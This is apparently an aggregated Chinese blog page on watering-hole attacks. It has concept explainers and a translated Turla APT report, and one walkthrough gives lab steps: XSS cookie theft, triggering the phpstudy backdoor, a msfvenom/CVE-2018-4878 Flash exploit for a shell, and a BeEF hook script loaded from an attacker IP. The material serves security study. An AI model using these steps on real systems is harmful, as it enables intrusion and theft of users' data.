精华内容
下载资源
问答
  • 水坑攻击
    千次阅读
    2022-02-13 10:41:34

    “水坑攻击”,黑客攻击方式之一,顾名思义,是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做法是,黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问的网站的弱点,先将此网站“攻破”并植入攻击代码,一旦攻击目标访问该网站就会“中招”

    水坑攻击属于APT攻击的一种,与钓鱼攻击相比,黑客无需耗费精力制作钓鱼网站,而是利用合法网站的弱点,隐蔽性比较强。在人们安全意识不断加强的今天,黑客处心积虑地制作钓鱼网站却被有心人轻易识破,而水坑攻击则利用了被攻击者对网站的信任。水坑攻击利用网站的弱点在其中植入攻击代码,攻击代码利用浏览器的缺陷,被攻击者访问网站时终端会被植入恶意程序或者直接被盗取个人重要信息。

    水坑攻击相对于通过社会工程方式引诱目标用户访问恶意网站更具欺骗性,效率也更高。水坑方法主要被用于有针对性的攻击,而Adobe Reader、Java运行时环境(JRE)、Flash和IE中的零漏洞被用于安装恶意软件。

    (SAW:Game Over!) 

    更多相关内容
  • 红队技巧:基于反向代理的水坑攻击 Pricking 项目(一) :使用介绍 Pricking 项目(二) :JS模块开发 Usage 使用本项目需要拥有一个域名,将A记录指向到当前服务器,否则只能通过IP访问。 $ git clone ...
  • 鱼叉攻击和水坑攻击之概念篇

    千次阅读 2021-04-30 21:44:08
    水坑攻击:watering hole。在受害者必经之路设置一个水坑,就是陷进。常见的做法是攻击者分析攻击目标的上网活动规律,经常访问哪些网站,然后利用网站漏洞在其中植入攻击代码,用户访问该网站就中招了。这种方式...

    对,好久没写了。静坐窗前,熟悉的场景,今天有点夏天的感觉。

    HVV刚刚结束,今年重点关注了一下,因为公司也在参与HVV,所以感觉今年的HVV离自己特别近,于是就听到各种相关讯息。今年的两周最后暴了几十个Nday漏洞,以为很多了,听到某安全人员说去年有100多,才知道已经漏洞已经少了许多。除了传统的技术,今年在社工这块真的有些百花齐放,各显神通的感觉。比如无人机窃取信息被打掉的,投递木马U盘的,做假工作牌混入HVV单位被识破的(脑补一下尴尬的场面)。如下两种攻击手法有的会多一点,我总会想到水坑里有鱼。。。

    鱼叉攻击:社工的方式很多人都明白,但是真有些防不胜防,比较多的方式还是使用钓鱼邮件,那我们就看看(spear phishing)鱼叉攻击。鱼叉攻击,肯定是有看到了鱼再叉,也就是有针对性的攻击,目标明确,比如公司或团体,给这些特定团体发送包含木马的邮件,这种邮件要让受害者打开,就需要一个欺骗和迷惑的标题。这个题目和内容的构造就考验红方的想象力了。比如打补丁的通知邮件,放假通知安排,投诉举报,简历投递或者来点公司的劲爆信息引爆吃瓜群众。员工点了附件之后,就中了木马,黑客在远端就可以远程控制这个电脑了。

    关于邮件木马再多说几句。

    (1)我有杀毒软件我不拍。普通用户也许觉得有杀毒软件就可以了,实际可不是这样,一个木马做了处理(就是免杀,可以通过加密,修改头文件,加壳等方式进行免杀)之后,杀毒软件很可能大部分都查杀不了,所以才会一个病毒有那么多变种。(一个免杀可能就贡献了一个变种)。

    (2)我不打开exe文件就安全。单纯。很早就有用office的组件来捆绑木马的情况。word和ppt都可以捆绑木马。比如一个word版本的5.1放假通知,正好赶上放假前期,如果再搞定一个公司的邮箱用来群发邮件,那么很可能是有那么几个人点开附件,也就中招木马。这种附件点了以后一样是可以正常打开文件的,只是后台悄咪咪的运行了木马相关的脚本,比如木马下载器,去下载更大的木马,然后黑客就可以远控你的电脑了。

    水坑攻击:watering hole。在受害者必经之路设置一个水坑,就是陷进。常见的做法是攻击者分析攻击目标的上网活动规律,经常访问哪些网站,然后利用网站漏洞在其中植入攻击代码,用户访问该网站就中招了。这种方式隐蔽性高,成功率较高。但有一定条件,网站要有漏洞可利用,以便用于部署恶意代码。用户访问被“加工”过的网站时,攻击代码会在客户端植入恶意代码或者直接窃取用户信息,有些就是将用户跳转到其他恶意网站。这些恶意网站中,恶意软件正等待将其与后续的网络钓鱼或勒索软件攻击挂钩。

    展开全文
  • ATT&ck 入口点 —— 水坑攻击

    千次阅读 2021-02-02 15:30:12
    水坑攻击 盗取Cookie phpstudy backdoor JSONP Adobe flash player 28(CVE-2018-4878) Beef 攻击框架 水坑攻击 分析并了解目标的上网活动规律,寻找目标经常访问的网站的漏洞,利用 漏洞在该网站植入恶意...

    目录

    水坑攻击

    盗取Cookie

    phpstudy backdoor

    JSONP 

    Adobe flash player 28(CVE-2018-4878)

    Beef 攻击框架


    水坑攻击

    分析并了解目标的上网活动规律,寻找目标经常访问的网站的漏洞,利用 漏洞在该网站植入恶意代码(陷阱、水坑),在目标进行访问时,攻击形 成。 多种可能被植入的代码,包括:

    • 1. 通过注入某些形式的恶意代码。例如:JavaScript、iframe、跨站脚本 等
    • 2. 植入恶意的广告链接
    • 3. 内置的 Web 应用程序接口用于插入任何其他类型的对象,该对象可用 于显示 Web 内容或包含在访问客户端上执行的脚本(例如,论坛帖 子,评论和其他用户可控制的 Web 内容)
    • 4. 重定向用户所经常访问的站点到恶意站点

    盗取Cookie

    地址https://blog.51cto.com/tdcqvip/2105099

    环境:使用xss测试平台【https://xsshs.cn/xss.php?do=project&act=view&id=43573

               靶机pikachu

    过程

    1、打开靶机平台,输入XSS测试平台的代码

    2、查看可以使用的代码xss

    3、运行结果后查看获取cookie 

     


    phpstudy backdoor

    概述

    后门代码存在于/ext/php_xmlrpc.dll模块中,用户可以通过搜索php_xmlrpc.dll模块中包含“@eval”关键字快速判断是否存在后门;递归检测当前目录下的dll文件中是否有相应字符;

    *程序包自带的PHP的php_xmlrpc.dll模块中有隐藏后门

    条件

    • php.ini中必须要引用该模块这样才能去复现该漏洞若开启了xmlrpc功能,php就会加载这个php_xmlrpc.dll动态链接库文件,其中的恶意代码就会被触发。
    • xml rpc是使用http协议做为传输协议的rpc机制(远程过程调用),使用xml文本的方式传输命令和数据。

    有问题的文件

    • Phpstudy\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
    • Phpstudy\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
    • Phpstudy\PHPTutorial\php\php-5.4.45-nts\ext\php_xmlrpc.dll

    影响

           phpstudy 2016(php5.4/5.2) phpstudy 2018(php5.4/5.2)

    附EXP:

    https://github.com/Any3ite/phpstudy_backdoor

    https://github.com/topics/phpstudybackdoor

    过程

    该后门利用比较简单,仅需提交两个参数

    Accept-Encoding: gzip,deflate

    Accept-Charset: Base64编码(PHP代码)

    攻击者:Windows 10系统
    靶机:    Windows 7虚拟机+phpstudy2016

    找到php_xmlrpc.dll文件查找是否存在eval函数内容

    GET请求方式;在Accept-Encoding中,deflate的前面都有一个空格,这个空格导致重访无法成功,去掉空格即可

     

     


    JSONP 

    地址:https://www.4hou.com/posts/p7Op

     


    Adobe flash player 28(CVE-2018-4878)

    地址:https://github.com/r00tSe7en/Flash-Pop

               https://github.com/wrlu/Vulnerabilities/blob/master/CVE-2018-4878/cve-2018-4878.py

    环境:kali【192.168.245.128 】 和 win7【192.168.245.129 】

    漏洞概述

    2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。

    攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell; 直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。

    过程

    攻击机:Linux kali

    靶机:Windows7 (安装26版本的flash)

      1、Linux 下载cve-2018-4878文件包

      2、利用msfvenom生成shell代码

      

       

     

       进入cve-2018-4878中将cve-2018-4878.py的内容替换为生成的shell代码并且修改最下面的文件存放路径

      

     

      3、cd 进入CVE-2018-4878目录使用python命令编译文件

      

      移动.html和.swf两个文件到apache中:
        cp index.html /var/www/html/index.html

        cp exploit.swf /var/www/html/exploit.swf

       启动metasploit:

       

     

      靶机访问构造好的网站http://攻击机IP/index.html 即可获取shell


    Beef 攻击框架

    Kali linux 系统默认未安装beef,需要自行安装

    1

    2

    apt-get update

    apt-get install beef-xss

    启动/usr/share/beef-xss

    1

    2

    cd /usr/share/beef-xss

    ./beef

    账号密码

    127.0.0.1:3000/ui/pannel

    beef/beef

      嵌入代码

    <script src="Ip:3000/hook.js">

    与Metasploit联动

    Beef配置文件

    /usr/share/beef-xss/config.yaml  

    1

    2

      metasploit:

    enablefalse

    改成

    1

    2

    metasploit:

    enabletrue

     

    vim /usr/share/beef-xss/extensions/metasploit/config.yaml

    原:

    1

    {os: 'custom', path: ''}

    修改成

    1

    {os: 'custom', path: '/usr/share/metasploit-framework/'}

    修改 host callback_host两参数,改为beef主机IP

    重启postgresq、metasploit、服务

    1

    service postgresql restart & service metasploit restart

     

    msfconsole #启动Metasploit

    MSF

    load msgrpc ServerHost=IP Pass=abc123

    MSF设置:

    use exploit/windows/browser/ie_execcommand_uaf

    show options

    set srvhost IP

    exploit/run

    测试: win7 x64与kali

     

     

    参考链接

    ATT&CK手册.pdf

    展开全文
  • 是一个自动化部署水坑和网页钓鱼的项目。 想要了解更多可以阅读: 用法 使用本项目需要拥有一个域名,将A记录指向到当前服务器,否则只能通过IP访问。 $ git clone https://github.com/Rvn0xsy/Pricking $ cd ...
  • 这篇文章将介绍Turla新型水坑攻击后门(NetFlash和PyFlash),研究人员发现Turla对Armenian的知名网站发起水坑攻击,通过伪造Adobe Flash更新,欺骗受害者下载两个新型恶意软件NetFlash和PyFlash,从而实现恶意攻击...

    这是作者新开的一个专栏,主要翻译国外知名的安全厂商APT报告文章,了解它们的安全技术,学习它们溯源APT组织的方法,希望对您有所帮助。前文分享了一种新型无文件APT攻击Kraken,它会利用Windows错误报告服务逃避检测。这篇文章将介绍Turla新型水坑攻击后门(NetFlash和PyFlash),研究人员发现Turla对Armenian的知名网站发起水坑攻击,通过伪造Adobe Flash更新,欺骗受害者下载两个新型恶意软件NetFlash和PyFlash,从而实现恶意攻击,整个攻击的TTP基本没有变化 ,但Turla第一次使用了Python后门程序。

    在这里插入图片描述



    一.什么是水坑攻击

    水坑攻击(Watering Hole)是黑客攻击方式之一,它是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做法是黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问网站的弱点,先将此网站“攻破”并植入攻击代码,一旦攻击目标访问该网站就会“中招”。由于此种攻击借助了目标团体所信任的网站,攻击成功率很高,即便是那些对鱼叉攻击或其他形式的钓鱼攻击具有防护能力的团体,也容易受骗。

    在这里插入图片描述

    水坑攻击属于APT攻击的一种,与钓鱼攻击相比,黑客无需耗费精力制作钓鱼网站,而是利用合法网站的弱点,隐蔽性比较强。在人们安全意识不断加强的今天,黑客处心积虑地制作钓鱼网站却被有心人轻易识破,而水坑攻击则利用了被攻击者对网站的信任。水坑攻击利用网站的弱点在其中植入攻击代码,攻击代码利用浏览器的缺陷,被攻击者访问网站时终端会被植入恶意程序或者直接被盗取个人重要信息。

    水坑攻击相对于通过社会工程方式引诱目标用户访问恶意网站更具欺骗性,效率也更高。水坑方法主要被用于有针对性的攻击,而Adobe Reader、Java运行时环境(JRE)、Flash和IE中的0day漏洞被用于安装恶意软件。下图展示了水坑攻击的基本流程。

    在这里插入图片描述

    水坑攻击广泛应用于APT组织发起的攻击中,比如海莲花、图拉、APT-C-01等,主要呈现出两个特征:

    • 多属于 APT 攻击,目标多为是大型、重要企业的员工或网站
    • 多利用 0-day 漏洞,如Adobe Flash高危漏洞CVE-2018-4878

    2012 年底,美国外交关系委员会的网站遭遇水坑攻击;2013年初,苹果、微软、纽约时报、Facebook、Twitter等知名大流量网站相继中招。国内网站也难以幸免,2013年,西藏ZF网站遭遇水坑攻击;2015年,百度、阿里等国内知名网站也因为JSONP漏洞而遭受水坑攻击。

    在这里插入图片描述

    那么,如何防御水坑攻击呢?
    针对这类攻击,重要的一点也是对用户进行教育,让他们意识到这类攻击及其危害性,遇到点击链接的要求时越谨慎越好。其次企业组织本身也要提高警惕,采取更高级的手段检测并对抗攻击。同时,安装必要的安全软件能有效识别恶意伪装软件。



    二.Turla组织

    Turla,也称为Venomous Bear、Waterbug和Uroboros,是迄今为止最为高级的威胁组织之一,并被认为隶属于俄罗斯ZF(该组织成员均说俄语)。虽然该组织被认为至少在2007年就已经成立,但直到2014年它才被卡巴斯基实验室发现。这主要是因为,该组织被证实能够利用卫星通信中固有的安全漏洞来隐藏其C&C服务器的位置和控制中心。

    我们都知道,一旦C&C服务器的位置暴露,幕后的操作者就会很容易被发现。因此,Turla组织具备的这种能力使得它能够很好地隐藏自己的位置和实施JD活动。卡巴斯基实验室在2017年进行的一项调查显示,相比于2015年,Turla组织已经将其卫星C&C注册数量增加了至少十倍。

    在这里插入图片描述

    90年代著名网络间谍组织“月光迷宫”(Moonlight Maze)就是今天Turla APT的前身,它们都具有大量相同的技术手段,且都与俄罗斯ZF黑客相关。1996年10月7日,美国科罗拉多矿业大学网络遭黑客入侵。攻击者通过Sun OS4操作系统漏洞入侵了该校布朗大楼内一台昵称为“Baby_Doe”的电脑,他们以这台电脑为中转陆续入侵了美国国家航空航天局、美国HAI军和KONG军总部及遍及全美的高校和军事机构。

    在美国多部门共同调查下发现,入侵者获取了从头盔设计到大气数据等大量美国JM信息,数量打印成稿的高度可堪比华盛顿纪念碑。随着调查继续深入,最终溯源为俄罗斯TG行为,由于其入侵活动多在夜间进行,且鉴于其行为复杂性,故命名为“月光迷宫”。该网络入侵行为是历史上第一个已知的网络APT攻击。从那时起人们也意识到,网络JD和网络Z不仅只是好莱坞电影中的把戏,而是种真实存在。“月光迷宫”开启了网络JD的篇章,也成为了很多黑客书籍中的经典案例。

    在网络入侵活动中,黑客一般会利用中转或跳板机作为攻击代理,防止溯源调查,而“月光迷宫”入侵者也是最早采用该技术的攻击者。他们利用很多国家的一系列大学、图书馆等存在系统漏洞的机构电脑作为中转跳板,存储攻击工具,发起网络攻击,以此迷惑调查行为。

    在这里插入图片描述

    自2007 年以来,Turla组织一直处于活跃状态,并制造了许多影响一时的大事件。比如,在2008年被指攻击了美国ZYSLB部,即Buckshot Yankee事件——通过U盘将一种名为“agent.btz”的恶意软件上传到了wu角大楼的jun事网络系统之中。另一起事件发生在2016年,也就是对瑞士JG企业RUAG集团的大规模网络攻击。在这起攻击中,Turla使用了网络JD软件Epic Turla(Turla软件家族的一个分支,被称为“史上最复杂的APT间谍软件”)、木马程序以及Rootkit恶意软件的组合。此外,被Turla攻击过的组织远不止于此,这包括乌克兰、欧盟各国政府以及各国大使馆、研究和教育组织以及制药、军工企业。

    根据卡巴斯基实验室的说法,Turla这些年来主要使用了以下几种攻击工具:

    • IcedCoffeer和KopiLuwak
    • Carbon
    • Mosquito
    • WhiteBear
    • LightNeuron

    从2015年起,Turla就已经开始通过多种方式利用Javascript、powershell、wsh,这包括恶意软件的下载和安装,以及完整后门的实现。在被VBA宏代码解密后,White Atlas框架通常会使用一个小型的Javascript脚本来执行恶意软件dropper有效载荷,然后再删除dropper以擦除痕迹。对于释放由Turla开发的Firefox扩展后门,White Atlas框架使用了一种更加复杂和高度混淆的Javascript脚本,该脚本仍然负责写入 extension.json 扩展配置文件,然后再删除自己。

    那么,如何溯源APT组织呢?这里简单补充下。

    • Turla APT和早期的蠕虫病毒Agent.BTZ高度相关
      2015年的VirusBulletin会议上,卡巴斯基研究人员Kurt Baumgartner表示,Turla APT和早期的蠕虫病毒Agent.BTZ高度相关,并且Agent.BTZ样本文件包含了对卫星基础设施的劫持攻击,与后期的Turla极为相似。“Turla日志会生成与Agent.btz相同的文件名(mswmpdat.tlb、winview.ocx和wmcache.nld)并保存在被入侵的系统中。Turla还使用了和Agent.btz如出一辙的XOR密匙为其日志文件加密。”
    • 这篇文章的水坑攻击与过去几年Turla的水坑攻击非常相似
      尤其是操作方式类似于在2017年发现的一个攻击事件,那里使用的各种JavaScript片段几乎与此攻击中的相同,但目标和有效负载不同。
    • KopiLuwak脚本通过宏代码进行解码,这与IcedCoffee非常相似。
      在2016年11月,卡巴斯基实验室观察到了新一轮的武器化宏文档。这些宏文档释放了一个新的、高度混淆的Javascript 有效载荷,即KopiLuwak。这种新的攻击工具所针对的目标与Turla之前所针对的目标是一致的(即针对欧洲各国ZF),但它的部署比IcedCoffee更具针对性。
    • “月光迷宫”攻击者由于其低级的英语水平和俄语倾向
      攻击者犯了一些细微的错误,比如在一个程序的逆向过程中,发现了其PDB程序路径中包含了可能是攻击程序开发成员的Max、Iron和Rinat。尽管这些程序有可能是在受害者机器上进行编译开发的,但这三个名字还在/myprg/、/mytdn/和/exploits/路径下都存在。其中值得注意的是,名为Iron的成员涉及开发了LOKI2后门早期的客户端程序cli。另外,在一个两次调用的进程PID信息中可以发现一个名为“grandchild”或“grandson”的俄语单词“vnuk”。

    在这里插入图片描述

    在这里插入图片描述

    参考文献:

    • 卡巴斯基:深度揭露俄罗斯APT组织Turla
    • 卡巴斯基:揭秘Turla APT的转世前身


    三.目标网站

    此次攻击事件中,Turla至少破坏了四个Armenian的网站,其中包括两个属于ZF的网站。因此,其攻击目标可能包括政府官员和政客。以下网站遭到入侵:

    • armconsul [.] ru:俄罗斯亚美尼亚大S馆领事处
    • mnp.nkr [.] am:Artsakh自然保护和自然资源部
    • aiisa [.] am:亚美尼亚国际和安全事务研究所
    • adgf [.] am:亚美尼亚存款担保基金

    ESET研究迹象表明,这些网站至少从2019年初以来就遭到了入侵。我们在发布前通知Armenian国家CERT,并与他们分享了我们的分析结果。Turla利用非法访问向网站中插入恶意JavaScript代码。 例如:

    • 对于mnp.nkr [.] am,在jquery-migrate.min.js(常见的JavaScript库)的末尾附加了混淆的代码,如下图所示。

    在这里插入图片描述

    此代码从 “skategirlchina[.]com/wp-includes/data_from_db_top.php” 加载外部的JavaScript 。我们将在下一部分中分析此代码。自2019年11月底以来,我们注意到 Skategirlchina [.com] 不再传播该恶意脚本,可能是Turla黑客人员已中止了该水坑攻击作业。



    四.指纹识别和传播链

    访问受感染的网页后,skategirlchina [.]com 会植入第二阶段的恶意JavaScript,并为访问者的浏览器添加指纹。下图显示了此脚本的主要功能。

    在这里插入图片描述

    • 第一次执行脚本
      如果这是用户浏览器第一次执行该脚本,它将添加一个evercookie,该cookie具有由服务器提供的随机MD5值,该值在每次执行脚本时都不同。 evercookie是基于GitHub代码实现的。它使用多个存储位置(如本地数据库、本地共享对象Flash cookie、Silverlight存储等)来存储cookie值。与常规Cookie相比,它的持久性更高,因为如果用户只是删除了浏览器的Cookie,它是不会被删除的。

    • 第二次访问受感染网站
      该evercookie将用于识别用户是否再次访问了受感染的网站。当用户第二次访问时,先前存储的MD5值可以用来识别第二次访问的行为。然后,它会收集浏览器插件列表、屏幕分辨率和各种操作系统信息,由POST发送到C&C服务器。如果有答复,则认为它是JavaScript代码,并使用eval函数执行。

    如果攻击者对感染目标感兴趣,则服务器会用一段创建iframe的JavaScript代码进行答复。来自ESET研究的数据表明,此次活动中Turla只对非常有限的访问网站感兴趣。之后该iframe会向用户显示虚假的Adobe Flash更新警告,目的是诱使他们下载恶意的Flash安装程序。下图展示了伪造的Adobe Flash更新iframe。

    在这里插入图片描述

    该安全研究组没有观察到任何浏览器漏洞的利用技术,此次活动仅依靠社会工程技巧。从与iframe的JavaScript相同的服务器上下载恶意可执行文件,如果用户手动启动了该可执行文件,则会安装Turla恶意软件以及合法的Adobe Flash程序。

    下图是从最初访问受感染的亚美尼亚网站后恶意负载的传输过程。整个流程比较清晰,访问受感染的网页后,skategirlchina [.]com 会植入恶意JavaScript,并为访问者的浏览器添加指纹;接着通过水坑攻击诱导受害者点击Adobe Flash更新,然后加载Turla恶意软件和合法的Flash程序,从事实施后续的攻击。

    在这里插入图片描述



    五.恶意软件

    当用户执行了伪造的安装程序,它将同时执行Turla恶意软件和合法的Adobe Flash安装程序。 因此,用户可能认为更新警告是合法的。

    1.2019年9月之前:Skipper

    在2019年8月结束之前,受害人将收到一个RAR-SFX存档,其中包含一个合法的Adobe Flash v14安装程序和另一个RAR-SFX存档。后者包含后门的各种组件,即Skipper。先前已归因于Turla,它是由Bitdefender的研究人员在2017年记录的,而最新版本是由Telsy在2019年5月记录的。

    鉴于文档版本和最新版本之间只有很小的变化,因此我们在这里将不提供详细的分析。一个有趣的变化是,Skipper通信模块使用托管该活动的远程JavaScript和恶意二进制文件的服务器为其C&C服务器,特别是:

    • Skategirlchina [.com / wp-includes / ms-locale.php

    2.从2019年9月开始:NetFlash和PyFlash

    在2019年8月底,我们注意到skategirlchina [.com] 交付的有效负载发生了变化。

    (1) NetFlash(.NET下载器)
    2019年8月末发现了新的恶意负载,新的恶意负载是一个.NET程序,它在%TEMP%\ adobe.exe中删除了Adobe Flash v32的安装程序,在%TEMP%\ winhost.exe中删除了NetFlash(.NET下载程序)。根据其编译时间戳分析,该恶意样本是在2019年8月底和2019年9月初编译的,然后再上传到水坑攻击的C&C服务器。

    NetFlash从硬编码URL下载其第二阶段恶意软件,并使用Windows计划任务为新后门建立持久性。下图显示了NetFlash的主要功能,该功能可下载名为PyFlash的第二阶段恶意软件。我们还发现另一个NetFlash样本,该样本可能在2019年8月底编译,具有不同的硬编码C&C服务器:

    • 134.209.222 [.] 206:15363

    在这里插入图片描述

    (2) PyFlash
    第二阶段后门是py2exe可执行文件。py2exe是一个Python扩展,用于将Python脚本转换为独立的Windows可执行文件。据我们所知,这是Turla开发人员第一次在后门使用Python语言。

    后门通过HTTP与硬编码的C&C服务器通信,在脚本的开头指定了C&C URL以及用于加密所有网络通信的其他参数(如AES密钥和IV),如下图所示,展示了PyFlash Python脚本中的全局变量。

    在这里插入图片描述

    该脚本的主要功能(如下图所示)将有关计算机的信息发送到C&C服务器,还包括与OS相关的命令(systeminfo、tasklist)和与网络相关的命令(ipconfig、getmac、arp)的输出结果。下图展示了PyFlash的主要功能。

    在这里插入图片描述

    C&C服务器还可以以JSON格式发送后门命令。在此版本的PyFlash中实现的命令是:

    • 从给定的HTTP(S)链接下载其他文件。
    • 使用Python函数subprocess32.Popen执行Windows命令。
    • 更改执行延迟:定期修改(每X分钟;默认为5分钟)启动恶意软件的Windows任务。
    • 卸载恶意软件。为了确认该指令,恶意软件使用以下字符串将POST请求发送到C&C服务器。

    在这里插入图片描述

    然后,命令的输出通过POST请求发送回操作员,并用AES加密。



    六.结论

    Turla仍将水坑攻击作为其初始入侵目标的策略之一。此攻击依赖社交工程学技巧,利用虚假的Adobe Flash更新警告来诱使用户下载并安装恶意软件。另一方面,有效载荷发生了变化,可能是为了逃避检测,恶意负载(payload)为NetFlash,并安装名为PyFlash的后门,该后门是使用Python语言开发的。

    我们将继续监视Turla的新活动,并将在我们的博客上发布相关信息。如有任何疑问,请通过threatintel [@] eset.com 与我们联系,也可以在我们的GitHub存储库中找到。

    IoCs:

    • 遭到破坏的网站

    在这里插入图片描述

    • C&C服务器

    在这里插入图片描述

    样本:

    在这里插入图片描述

    MITRE ATT&CK框架技术

    • 后续作者会分享一篇文章详细介绍ATT&CK框架在APT组织中的应用

    在这里插入图片描述

    最后希望这篇文章对您有所帮助,感觉Python后门和水坑攻击挺有意思的,后续不忙可以尝试复现相关的功能。今天是1024,还是挺喜欢一年前《我与CSDN这十年》这篇文章的,人生又有多少个十年啊!最近实验室忙疯了,今天最终于可以回家陪女神。路漫漫其修远兮,继续加油,珍惜当下,准备回家喽~这篇文章是在高铁G401上写的,加油!

    在这里插入图片描述

    前文分享:

    2020年8月18新开的“娜璋AI安全之家”,主要围绕Python大数据分析、网络空间安全、逆向分析、APT分析报告、人工智能、Web渗透及攻防技术进行讲解,同时分享CCF、SCI、南核北核论文的算法实现。娜璋之家会更加系统,并重构作者的所有文章,从零讲解Python和安全,写了近十年文章,真心想把自己所学所感所做分享出来,还请各位多多指教,真诚邀请您的关注!谢谢。

    在这里插入图片描述

    (By:Eastmount 2020-10-24 星期六 晚上8点写于高铁 http://blog.csdn.net/eastmount/ )

    展开全文
  • 2019年12月4日,卡巴斯基研究人员发现了一些水坑攻击网站,这些网站可以利用伪造的Adobe Flash更新来选择性地触发顺带下载攻击。该攻击活动自2019年月开始活动,主要攻击对象是亚洲的民族和宗教组织。 研究人员分析...
  • 声明:一切知识服务于国家信息安全建设,...本文所述守株待兔式攻击,即时在入口点埋设陷阱,等着受害者入坑,此类攻击即常说的Initial Access中的“水坑攻击”。 常见的水坑攻击可利用如下漏洞进行的: 存储型X...
  • 大学生 · 2015/06/15 15:290x00 简介前几天安全研究者Jaime Blasco发现了在中国某些特定主题的网站被进行了水坑攻击,攻击方法有一定多样性,其中存在一些比较少见于此类型攻击中的技术,不过其实是比较早的技术了...
  • 钓鱼和水坑则是快速打点或横向的常用手段。钓鱼通常需要绕过目标邮件网关等安全设备,水坑则需要摸清目标的操作习惯。在此简单的罗列一下布置水坑的方法。ps:本文未涉及任何真实案例。 水坑简述 布置水坑的目的...
  • 导语: 水坑攻击是一种常见的高级攻击方法。电脑管家安全感知系统最近捕获到一例,分析如下。 “门前大桥下,游过一群鸭 快来快来数一数,二四六七八……” “Duck?” “No,Hacker!” “Hacker?” “Yes,Hacker!“ ...
  • 水坑攻击 在技术日新月异的今天,网络攻防永无止日。技术的发展使得网络攻击形态不断变化,并衍生出不少新的攻击方法,水坑攻击便是其中一种。根据赛门铁克(Symantec)最新发布的2012网络安全威胁报告,水坑攻击...
  • 水坑钓鱼攻击

    千次阅读 2020-05-24 19:42:27
    水坑攻击 水坑攻击,顾名思义,是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做法是,黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问的网站的弱点,先将此网站“攻破”并植入攻击代码,一旦攻击...
  • 几种诱骗攻击手段(鱼叉、水坑、诱骗)说明
  • 攻防技术中,攻击一些名词解释
  • 渗透测试专业术语——攻击
  • 水抗攻击 apt攻击手段

    2020-03-01 11:37:25
    所谓“水坑攻击”是指黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站的弱点,先攻下该网站并植入攻击代码,等待被攻击者来访时实施攻击。 这种攻击行为类似《动物世界》纪录片中的一种情节:捕食...
  • DDOS攻击

    2018-11-04 19:39:35
    水坑攻击:攻击者首先通过猜测(或观察)确定这组目标经常访问的网站,然后入侵其中一个或多个网站,植入恶意软件。在目标访问该网站时,会被重定向到恶意网址或触发恶意软件执行,导致该组目标中部分成员甚至全部...
  • 韩国安全研究人员Simon Choi 近两日宣称,朝鲜APT组织APT37/B team利用韩国ActiveX软件0day漏洞zhe发起水坑攻击.详情过程请看下图下列攻击...
  • 一些笔记笔记

    千次阅读 2022-03-27 10:48:01
    1.鱼叉式攻击水坑攻击 鱼叉式攻击:指利用木马程序作为电子邮件的附件,发送到目标电脑上,诱导受害者去打开附件来感染木马。 水坑攻击:分析目标的上网规律,寻找目标经常访问的网站的弱点,攻破该网站,并...
  • 文章目录漏洞原理及防御XSS 原理分析:输出问题导致js代码被识别执行XSS 技术分类Cookie盗取基于Xss的WebShell箱子的攻击XSS相关防护过滤及绕过分析(参考链接)防护:绕过:实战知识点 漏洞原理及防御 XSS又叫CSS ...
  • CISSP涉及到的漏洞梳理

    千次阅读 2020-10-24 22:41:04
    1.1 Smurf攻击 攻击过程 1.2 死亡之ping 1.3 ICMP重定向攻击 1.4 IP欺骗 2. TCP&UDP相关漏洞 2.1 Fraggle 攻击 2.2 Teardrop 攻击 2.3 Sync Flood 攻击 3. DNS相关漏洞 3.1DNS区域域传送漏洞 3.2 DNS...
  • 常见网络钓鱼攻击类型

    千次阅读 2021-01-12 10:16:24
    常见网络钓鱼攻击类型 CEO欺诈或商务邮件欺诈(BEC)——假装公司的CEO或其他高管,向级别较低的员工(通常是会计或财务部门的员工)发送电子邮件,这些电子邮件的目的是获取商业机密信息或让受害者将资金转移到一个虚假...
  • 水坑攻击是攻击者识别其目标受害者使用的公共资源,并专注于利用该资源以获得可信向量的地方。 该工具从文本文档中提取潜在的水坑,排除前 1000 个最常见的域,以便工程师专注于更容易被利用的域。 目前,这就是它...
  • 最常见的社会工程攻击

    千次阅读 2019-10-23 09:32:05
    社会工程 社工 黑客攻击
  • APT(Advanced Persistent Threat),中文释义为高级持续性威胁,APT攻击是一种利用先进攻击手段对特定目标进行长期持续性攻击攻击形式。 它的攻击原理相对于其他攻击形式更为高级和先进,其高级性主要体现在APT...
  • 关于红队在渗透测试中使用的网络钓鱼攻击的文章很多,不过大多数的介绍都是不完整的。在本文中,我们将对这个话题进行一次完整的梳理,包括域创建,制作网络钓鱼内容,绕过垃圾邮件过滤器和电子邮件网关,生成不可...
  • APT攻击案例分享

    2012-11-15 20:44:11
    APT是指高级的持续性的渗透攻击,是针对特定组织的多方位的攻击;APT不是一种新的攻击手法,因此也无法通过阻止一次攻击就让问题消失。

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 797
精华内容 318
关键字:

水坑攻击

友情链接: studentApartmentSystem.rar